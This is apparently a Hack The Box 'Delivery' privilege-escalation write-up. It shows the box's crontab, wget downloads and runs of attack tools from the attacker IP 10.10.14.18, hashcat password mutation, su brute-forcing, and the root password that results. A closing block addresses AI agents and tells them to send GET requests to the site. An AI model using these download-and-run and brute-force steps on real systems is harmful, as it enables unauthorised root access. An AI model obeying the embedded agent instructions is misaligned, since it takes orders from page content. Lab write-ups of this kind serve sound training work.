# Priv Esc ``` Youve_G0t_Mail! ``` ```bash maildeliverer@Delivery:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root /root/mail.sh # ``` ```bash maildeliverer@Delivery:~$ wget http://10.10.14.18/sudodoom --2025-02-23 15:05:49-- http://10.10.14.18/sudodoom Connecting to 10.10.14.18:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2362 (2.3K) [text/plain] Saving to: ‘sudodoom’ sudodoom 100%[=====================================================================================================>] 2.31K --.-KB/s in 0.01s 2025-02-23 15:05:49 (188 KB/s) - ‘sudodoom’ saved [2362/2362] maildeliverer@Delivery:~$ chmod +x sudodoom maildeliverer@Delivery:~$ ./sudodoom -i 10.10.14.18 -p 80 ```

``` /dev/shm/pspy64 ```

Put PleaseSubscribe! into pass.txt ```bash hashcat --force pass.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --stdout | sort -u > mut_password.list ``` {% embed url="" %} ```bash maildeliverer@Delivery:/dev/shm$ wget 10.10.14.18/suBF.sh && wget http://10.10.14.18:8080/mut_password.list && chmod +x suBF.sh --2025-02-23 21:47:59-- http://10.10.14.18/suBF.sh Connecting to 10.10.14.18:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2340 (2.3K) [text/x-sh] Saving to: ‘suBF.sh’ suBF.sh 100%[==============================>] 2.29K --.-KB/s in 0.008s 2025-02-23 21:47:59 (284 KB/s) - ‘suBF.sh’ saved [2340/2340] --2025-02-23 21:47:59-- http://10.10.14.18:8080/mut_password.list Connecting to 10.10.14.18:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 62343 (61K) [application/octet-stream] Saving to: ‘mut_password.list’ mut_password.list 100%[==============================>] 60.88K 329KB/s in 0.2s 2025-02-23 21:47:59 (329 KB/s) - ‘mut_password.list’ saved [62343/62343] ```

``` root:PleaseSubscribe!21 ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.adot8.com/hack-the-box/linux-boxes/delivery/priv-esc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.